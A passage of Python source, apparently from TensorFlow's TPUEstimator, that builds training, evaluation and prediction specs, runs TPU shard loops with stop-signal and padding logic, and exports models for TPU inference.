embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and
isinstance(cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
